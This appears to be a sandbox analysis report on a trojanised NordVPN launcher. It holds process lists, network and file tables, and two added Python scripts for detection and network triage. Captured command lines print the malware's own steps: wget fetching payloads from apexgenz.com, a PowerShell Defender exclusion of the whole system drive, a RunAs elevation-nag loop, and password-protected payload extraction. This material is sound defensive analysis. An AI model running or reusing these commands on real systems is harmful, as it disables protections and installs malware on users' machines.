"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\2plugin20718

C:\Users\Admin\AppData\Roaming\services\2plugin20718

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\3plugin16826

C:\Users\Admin\AppData\Roaming\services\3plugin16826

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 960

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5940 -ip 5940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1176

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\NordVPN-10_11\" -spe -an -ai#7zMap8338:88:7zEvent13711

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1140
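
Most of the "suspicious" rows in the signature tables above (AdjustPrivilegeToken, WriteProcessMemory, SendNotifyMessage) belong to firefox.exe and 7zG.exe: that is the analyst downloading NordVPN-10_11.zip and unpacking it, not the sample. The chain itself is carried entirely by the command lines in the process list: Launcher.exe copies itself to %AppData%\Roaming\services as the misspelt Launhcer.exe, a PowerShell loop re-prompts for elevation with Start-Process -Verb RunAs until the user gives in, a second PowerShell excludes the whole system drive from Defender, a dropped wget.exe fetches three payloads from apexgenz.com, a dropped winrar.exe unpacks each with the password jryj2023, and the extensionless plugin binaries run, one of them spawning sihost.exe under a spoofed parent and the tree ending in a bare dialer.exe. The script below is an added example, not part of the sandbox report or any vendor product: it replays those command lines (transcribed from the list above, with the Firefox, rundll32, 7-Zip and WerFault entries left out) through a small rule set of the kind a detection engineer would write over process-creation telemetry, and collects the IOCs the rules expose. The rule names, the choice of dialer.exe as a bare-host indicator and the regexes are this example's own assumptions.

```python
import re
from typing import Dict, List, NamedTuple, Set, Tuple


class Finding(NamedTuple):
    rule: str
    image: str
    detail: str


# (image, command line) pairs transcribed from the behavioral1 process list
# above. Firefox, rundll32, 7-Zip and WerFault entries are omitted: they are
# the analyst's download-and-extract session and crash reporting, not the chain.
PROCESSES: List[Tuple[str, str]] = [
    (r"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe",
     r'"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"'),
    (r"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe",
     r'"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"'),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"'''),
    (r"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe",
     r'"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"'),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "'),
    (r"C:\Users\Admin\AppData\Roaming\services\wget.exe",
     r'"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services'),
    (r"C:\Users\Admin\AppData\Roaming\services\winrar.exe",
     r'"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services'),
    (r"C:\Users\Admin\AppData\Roaming\services\plugin16904",
     r"C:\Users\Admin\AppData\Roaming\services\plugin16904"),
    (r"C:\Users\Admin\AppData\Roaming\services\wget.exe",
     r'"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services'),
    (r"C:\Windows\SysWOW64\dialer.exe", r'"C:\Windows\system32\dialer.exe"'),
    (r"C:\Users\Admin\AppData\Roaming\services\wget.exe",
     r'"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services'),
]

# System binaries that have no business in this tree when started with an
# empty command line (assumption for this example; tune per environment).
BARE_HOST_BINARIES = {"dialer.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(processes: List[Tuple[str, str]]) -> List[Finding]:
    findings: List[Finding] = []
    for image, cmd in processes:
        name, low = basename(image), cmd.lower()
        if name == "powershell.exe":
            if re.search(r"-executionpolicy\s+bypass", low):
                findings.append(Finding("ps_execpolicy_bypass", image, "-ExecutionPolicy Bypass"))
            m = re.search(r'add-mppreference\s+-exclusionpath\s+([^"]+)', cmd, re.I)
            if m:
                paths = [p.strip() for p in m.group(1).split(",")]
                whole_drive = any(re.fullmatch(r"(\$env:systemdrive|[a-z]:)\\?", p, re.I) for p in paths)
                findings.append(Finding("defender_exclusion", image,
                                        "; ".join(paths) + (" [whole system drive]" if whole_drive else "")))
            if re.search(r"while\s*\(\s*\$true\s*\).*-verb\s+runas", low):
                findings.append(Finding("uac_prompt_loop", image, "Start-Process -Verb RunAs inside while ($true)"))
        if "\\appdata\\roaming\\" in image.lower():
            url = re.search(r"https?://\S+", cmd)
            if url:
                findings.append(Finding("appdata_downloader", image, url.group(0)))
            pw = re.search(r"\s-p(\S+)", cmd)  # RAR-style -p<password>; wget's upper-case -P is a directory
            if pw and re.search(r"\s+x\s", cmd):
                findings.append(Finding("password_archive_extract", image, "password=" + pw.group(1)))
            if "." not in name:
                findings.append(Finding("extensionless_executable", image, name))
        if name in BARE_HOST_BINARIES and cmd.strip().strip('"').lower().endswith("\\" + name):
            findings.append(Finding("bare_host_binary", image, "started with no arguments"))
    # Names built from the same letters (Launcher.exe vs Launhcer.exe) are a hide-in-plain-sight tell.
    by_letters: Dict[str, Set[str]] = {}
    for image, _ in processes:
        by_letters.setdefault("".join(sorted(basename(image))), set()).add(basename(image))
    for group in by_letters.values():
        if len(group) > 1:
            findings.append(Finding("lookalike_name", ", ".join(sorted(group)), "same letters, different spelling"))
    return findings


def iocs(findings: List[Finding]) -> Dict[str, List[str]]:
    return {
        "rules": sorted({f.rule for f in findings}),
        "urls": sorted({f.detail for f in findings if f.rule == "appdata_downloader"}),
        "archive_passwords": sorted({f.detail.split("=", 1)[1] for f in findings if f.rule == "password_archive_extract"}),
    }


if __name__ == "__main__":
    for f in triage(PROCESSES):
        print(f"{f.rule:26} {f.image}  {f.detail}")
    print(iocs(triage(PROCESSES)))
```

Each rule is deliberately narrow enough to explain to a responder in one line, which is what makes them reusable as Sysmon Event ID 1 or EDR process-creation queries; the whole-drive Defender exclusion and the RunAs loop are the two that would fire on a real host long before the stealer payload matters.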

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 41.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
N/A 127.0.0.1:51483 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.117.237.239:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 52.25.97.240:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 240.97.25.52.in-addr.arpa udp
N/A 127.0.0.1:51489 tcp
US 8.8.8.8:53 www.google.com udp
DE 142.250.186.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
DE 142.250.186.68:443 www.google.com udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 68.186.250.142.in-addr.arpa udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 67.185.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.184.250.142.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 40.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 vpngets.com udp
US 172.67.131.227:80 vpngets.com tcp
US 172.67.131.227:80 vpngets.com tcp
US 8.8.8.8:53 vpngets.com udp
US 8.8.8.8:53 vpngets.com udp
US 172.67.131.227:443 vpngets.com tcp
US 172.67.131.227:443 vpngets.com udp
US 8.8.8.8:53 neo.tildacdn.com udp
DE 162.55.188.142:443 neo.tildacdn.com tcp
US 8.8.8.8:53 neo.tildacdn.com udp
US 8.8.8.8:53 neo.tildacdn.com udp
US 8.8.8.8:53 227.131.67.172.in-addr.arpa udp
US 8.8.8.8:53 202.185.250.142.in-addr.arpa udp
US 8.8.8.8:53 142.188.55.162.in-addr.arpa udp
US 8.8.8.8:53 stat.tildacdn.com udp
GB 193.3.17.198:443 stat.tildacdn.com tcp
US 8.8.8.8:53 stat.tildacdn.com udp
US 8.8.8.8:53 stat.tildacdn.com udp
US 8.8.8.8:53 198.17.3.193.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
AU 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 bitbucket.org udp
US 8.8.8.8:53 bitbucket.org udp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 3.5.28.226:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 s3-w.us-east-1.amazonaws.com udp
US 8.8.8.8:53 s3-w.us-east-1.amazonaws.com udp
US 3.5.28.226:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 226.28.5.3.in-addr.arpa udp
US 8.8.8.8:53 s3-w.us-east-1.amazonaws.com udp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 3.5.28.226:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 stat.tildacdn.com udp
US 8.8.8.8:53 neo.tildacdn.com udp
US 8.8.8.8:53 neo.tildacdn.com udp
US 8.8.8.8:53 voloz.site udp
US 172.67.145.170:443 voloz.site tcp
US 8.8.8.8:53 voloz.site udp
US 8.8.8.8:53 voloz.site udp
US 8.8.8.8:53 170.145.67.172.in-addr.arpa udp
US 172.67.145.170:443 voloz.site udp
US 8.8.8.8:53 vpnsget.pw udp
US 8.8.8.8:53 vpnsget.pw udp
US 172.67.165.66:443 vpnsget.pw tcp
US 8.8.8.8:53 vpnsget.pw udp
US 8.8.8.8:53 66.165.67.172.in-addr.arpa udp
US 172.67.165.66:443 vpnsget.pw udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 apexgenz.com udp
NL 185.14.29.199:80 apexgenz.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 199.29.14.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 185.14.29.199:80 apexgenz.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
NL 185.14.29.199:80 apexgenz.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
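
Most of the rows above are analysis-VM noise: reverse (`in-addr.arpa`) lookups the sandbox issues for every peer it sees, Firefox and Google telemetry from the browser on the image, and the DNS queries that precede each connection. What is left is a short list of contacted hosts, some of which are public hosting services (bitbucket.org, raw.githubusercontent.com, an S3 bucket) and some of which are domains with no obvious owner. The script below is an added triage example, not part of the sandbox report: it parses rows in the table's own layout, sorts them into those buckets and returns the domains worth pivoting on. `SAMPLE_ROWS` is a subset of the rows copied from the table; the `SANDBOX_NOISE` and `LEGIT_HOSTING` suffix lists are my assumptions and should be tuned per environment. "unknown" means "not in any list", not a verdict of malicious.

```python
"""Triage helper for a sandbox 'Network' table.

Added example, not part of the sandbox report. SAMPLE_ROWS is a subset of
rows copied from the report's table; the suffix lists that decide what is
analysis-VM noise and what is a legitimate hosting service are my own
assumptions and should be tuned per environment.
"""
from collections import defaultdict

# Rows copied from the report ("Country Destination Domain Proto"); loopback
# and mDNS rows have no domain column.
SAMPLE_ROWS = """\
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
N/A 127.0.0.1:51483 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.117.237.239:443 contile.services.mozilla.com tcp
DE 142.250.186.68:443 www.google.com tcp
US 172.67.131.227:80 vpngets.com tcp
US 172.67.131.227:443 vpngets.com tcp
DE 162.55.188.142:443 neo.tildacdn.com tcp
AU 104.192.141.1:443 bitbucket.org tcp
US 3.5.28.226:443 bbuseruploads.s3.amazonaws.com tcp
US 172.67.145.170:443 voloz.site tcp
US 172.67.165.66:443 vpnsget.pw tcp
N/A 224.0.0.251:5353 udp
NL 185.14.29.199:80 apexgenz.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
"""

# Assumed lists: browser/OS telemetry the analysis VM generates on its own,
# and public hosting services that malware commonly stages payloads on.
SANDBOX_NOISE = (".mozilla.com", ".mozilla.net", ".mozaws.net", ".mozgcp.net",
                 "www.google.com")
LEGIT_HOSTING = ("bitbucket.org", "raw.githubusercontent.com", ".s3.amazonaws.com")


def parse_rows(text):
    """Parse table rows into (country, dest, domain, proto); domain may be None."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        if len(parts) == 3:                # no domain column
            country, dest, proto = parts
            domain = None
        elif len(parts) == 4:
            country, dest, domain, proto = parts
        else:
            raise ValueError(f"unexpected row layout: {line!r}")
        rows.append((country, dest, domain, proto))
    return rows


def _matches(domain, suffixes):
    return any(domain == s or domain.endswith(s) for s in suffixes)


def classify(domain, dest):
    """Verdict for one row; order matters (PTR lookups also go to 8.8.8.8:53)."""
    if domain is None:
        return "local"          # loopback or multicast, no external peer
    if domain.endswith(".in-addr.arpa"):
        return "ptr"            # reverse lookups the sandbox issues for every peer
    if dest.endswith(":53"):
        return "dns"            # the query; the connection row carries the verdict
    if _matches(domain, SANDBOX_NOISE):
        return "noise"
    if _matches(domain, LEGIT_HOSTING):
        return "legit-hosting"
    return "unknown"            # not in any list: a pivot candidate, not a verdict


def triage(text):
    """Group distinct (domain, ip:port, proto) triples by verdict."""
    buckets = defaultdict(set)
    for _country, dest, domain, proto in parse_rows(text):
        buckets[classify(domain, dest)].add((domain, dest, proto))
    return {k: sorted(v, key=lambda t: (t[0] or "", t[1], t[2]))
            for k, v in buckets.items()}


def pivots(text):
    """Domains worth pivoting on: unknown peers, then the hosting services used."""
    t = triage(text)
    return {
        "unknown": sorted({d for d, _, _ in t.get("unknown", [])}),
        "legit_hosting": sorted({d for d, _, _ in t.get("legit-hosting", [])}),
    }


if __name__ == "__main__":
    for verdict, rows in sorted(triage(SAMPLE_ROWS).items()):
        print(verdict, rows)
    print(pivots(SAMPLE_ROWS))
```

Run against the sample rows, the "unknown" bucket is apexgenz.com, neo.tildacdn.com, voloz.site, vpngets.com and vpnsget.pw, and the hosting bucket is the S3 bucket, bitbucket.org and raw.githubusercontent.com; the connection rows (not the DNS rows) carry the verdict, so a host that only ever appears as a query shows up under "dns" and nowhere else.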

Files

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\pending_pings\ab8cdac4-8a8f-4c93-8d2f-7d03ffd575d4

MD5 fb403e3808249a0ef5d50d1108f9770b
SHA1 09c96d890347b6ab12dc250a2764baeef8e703f7
SHA256 f8673694373c1631e2612e2fc05ad0099fad9a49286f0c43a3344f1eb80a6c83
SHA512 d1ce8473cfa30edc0804ed30ae5b5eba24f8d13910f41cb7011ab3b502fee63253371921768b6561584292f4c91cd27d64bc95314f6a800f52e70afe6a34b307

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\pending_pings\efeb1311-ca69-4ea6-b522-9dc391810200

MD5 23d75d5683d0d770da46ba9c7b518818
SHA1 54102604312975c92706242ec9ef060947becfd9
SHA256 2bf63a115c0e147279e6e32796bf6a24315a6305041c5ce888ac9a73301daef1
SHA512 5a37df93a89144250edeb039721f60c0fe383479ae112c0dda2a430aaeac9ea0aed0fe6b5a34ae6efa83d956ce000ba5b861a81546ff9d1aa4dacc8bf42006fa

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\db\data.safe.bin

MD5 f05f543617b8face46542d646c55b6d1
SHA1 31a0b7e87707eb1361ecb4bc6f0152a955c4b973
SHA256 ae11567b65bea21ccc814cfec8fcba1109207a4eff99d3fc84ff551c3749645d
SHA512 27aac929a3cd91baec3af5643b89e7903a75ef8044f91c29b471660b26d3e35fbafd2d7c4e3e8985a8a0262818943a23e4ce35bcd94cf1989d018d771ba3e1a0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\prefs-1.js

MD5 1008a57a9212174c182b3793c3fec936
SHA1 ef60d8b64148df6f11fb80f33f00352c4ec63489
SHA256 7b3810d2df381c9ecc386e495e4d2dacf98edcffec141fefdf14ef9e1a330b64
SHA512 a2562c4d8b6e75193c109a128fa4c58f09bda8a93feacdcc782571067c5bf09164fb76b76ca76ee48ff79b5dd9fa43b4b97236bf8c78002d23358d1efb76c80a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4

MD5 6909468c9f43c288423627fdd7cd5470
SHA1 393d01e5cd85d4a622e2cda5c01aaceaa1edacf1
SHA256 f6c27baddbd79ef5c502740a766b79ab1a268807ca75f2f39f9fb2620d8efbe6
SHA512 8aa7ba379e24c801c25b09152c70c42c877cb0c0fa6d7502fc34d8203729af37bfef488f3bbf407a24710eabd06b8811fae0381b1dc5a0cbde675b77a7605926

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4

MD5 1639e98f6397aed6f1f6cf6a89c20748
SHA1 1879bb1a689b482a9b8d1e0fc0c19d5f9416d702
SHA256 584456e5d5de4ee42642463c4487b10309545ce2c75f14990c5437b1b2aabdd1
SHA512 9d9c7d96b05d006312a07ffce188ccab74c540904d25f10044ce23078ec0f75184ce18dc0d4876f54c95c27428881fdbf79956dfc1205ab1776fb14209731f0b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4

MD5 69a8226367e9975efcaaf037c6dc1d07
SHA1 ca3d47439ecd6781f23423e3b3973be06a9e07d1
SHA256 1d733f1d4f2c4919f0064552d6f0e2edefa41bd1b4c6ee1d3b22e52f9517196d
SHA512 b08af08ec931c62254dbb70d751ddc4e74d7f250a68c5eadce8e7cd2317076c49a6e7cf7e62c3dbdff9980a2068cd0cc0c36eb4a93cf01a27776f940ba563956

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\gaix9yhh.default-release\thumbnails\49c6eaf24c972ce4720459699ad41679.png

MD5 76197863ae28765b85face61d51e8309
SHA1 57f2e2fb95137aa89326679cb733541253093be8
SHA256 28076a9d77b31f0047d40540d98f85dcb2481eaa516cff0291012254355a856f
SHA512 5a5da73028b2af59b15b820edddc603543615b8a266d4facc36ce475a455befa291f0989f2b283e2ecb8aa7ad199d1cfea65ae90536f403cc43dcad7a50a5679

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4

MD5 0cfbf43267c6264d825234e78b0d683f
SHA1 98e071c20b2e065b256b1f85ce0d8983ba8df464
SHA256 eac65b2c7459ce8a38458e9767a1b44f2056e314c08ad1220896c09d2f8afc32
SHA512 f89fc31fa161e7d24c54b352a44e740a6284e235516f42d96bad6707c7ee0062699eed30045ef06f90dc2bdb6d0d18a0d9da4cc69385a35aea062fcfbda80664

C:\Users\Admin\Downloads\NordVPN-10_11.g2vukrUZ.zip.part

MD5 dc4f1a240f8a940977284ce77f876439
SHA1 6b013a62e9d0d511256f69abc4ded33c7f291772
SHA256 3f80c20fecafcfa264532eae938edb81dd04c8d0335c366f0b3c4c64ad529967
SHA512 f92f00734f19c669c26febe8e227d7a2f3f23b901e21c9a9ec19ad9e4aac9863c9ef32f03b8d646ec4a4e1d67769d833012698c0d720a049f0c9af342d3f29c1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\prefs.js

MD5 e29ab0d2aa826448bfb09679b6872a4a
SHA1 22216ffd94871730bdd0239136d175d8c9a726d2
SHA256 9248cf38e788be8a0f998ae84441f199fc5785127872bde784a4458df2f0d4e4
SHA512 8147a2582ca0a8da71f096fbdb040607fd3f2c56e8c7c7686f58862d44425124ca2715b0984509aaf8802a569d8320d6cb72bf6d7a03f0ecd03cf2db5b6cfb33

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4

MD5 965adcaec10c82840e217cf82bd83422
SHA1 ca82b0dcc8023ff30c84a0962480f3e22d573ae2
SHA256 3d389c8ef6f58d1b44f17f491b49b398ac24710d55b7e2773ac8f5b31544fa70
SHA512 f316414c15d38b0af00d4aebc5e5e9dff3f837baeb8b98cc0e5417e4031db43d93bbb505cdc36d04b8a804dd15dea61383d9789ad9f22cddd4041450a2225d34

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4

MD5 446fca81f3127bb659ef84813c02a5e0
SHA1 0a1818f315efc19a9e8e1ba1420ef434f4fbfe15
SHA256 cf3a1aad00a2216474d0ce7e5e63a43cc1c2d41e2d15263a0bfafa2ae9f701bc
SHA512 611de8be487e8592205eea520ea19923acf2ba18e59ba37985e4a1ee6592aa0bf9fd14daabf8cac1f44bd3b29494f3513ad2c85c7bfdd43bea0a7d79a19f70f1

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

MD5 93fde4e38a84c83af842f73b176ab8dc
SHA1 e8c55cc160a0a94e404f544b22e38511b9d71da8
SHA256 fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
SHA512 48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.dll

MD5 32e7556ff4f5256d15e1fc843cee5e3d
SHA1 b7283061428e9ca741c26dcfc3e869e2fc699f0b
SHA256 b2f5dfcba2018e9b4314c245f6391783bd3717fe02fec3e6edf1b9d1a3801278
SHA512 d39ca3fd8edb7db7e19655ea3aa69d8b0a4008514ed356808b59f7cdf4c109b7efd0ed54f6ea099d37b33f107f234adc4f01a178c90961e88d3c9ed7a8ebe40e

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe.manifest

MD5 1b6de83d3f1ccabf195a98a2972c366a
SHA1 09f03658306c4078b75fa648d763df9cddd62f23
SHA256 e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724
SHA512 e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\data\Launcher.dll

MD5 f58866e5a48d89c883f3932c279004db
SHA1 e72182e9ee4738577b01359f5acbfbbe8daa2b7f
SHA256 d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12
SHA512 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\WinRAR.exe

MD5 f59f4f7bea12dd7c8d44f0a717c21c8e
SHA1 17629ccb3bd555b72a4432876145707613100b3e
SHA256 f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4
SHA512 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\wget.exe

MD5 8c04808e4ba12cb793cf661fbbf6c2a0
SHA1 bdfdb50c5f251628c332042f85e8dd8cf5f650e3
SHA256 a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272
SHA512 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\Launhcer.exe.manifest

MD5 f0fc065f7fd974b42093594a58a4baef
SHA1 dbf28dd15d4aa338014c9e508a880e893c548d00
SHA256 d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693
SHA512 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\Launhcer.exe

MD5 e5c00b0bc45281666afd14eef04252b2
SHA1 3b6eecf8250e88169976a5f866d15c60ee66b758
SHA256 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903
SHA512 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\Launhcer.dll

MD5 7de0541eb96ba31067b4c58d9399693b
SHA1 a105216391bd53fa0c8f6aa23953030d0c0f9244
SHA256 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e
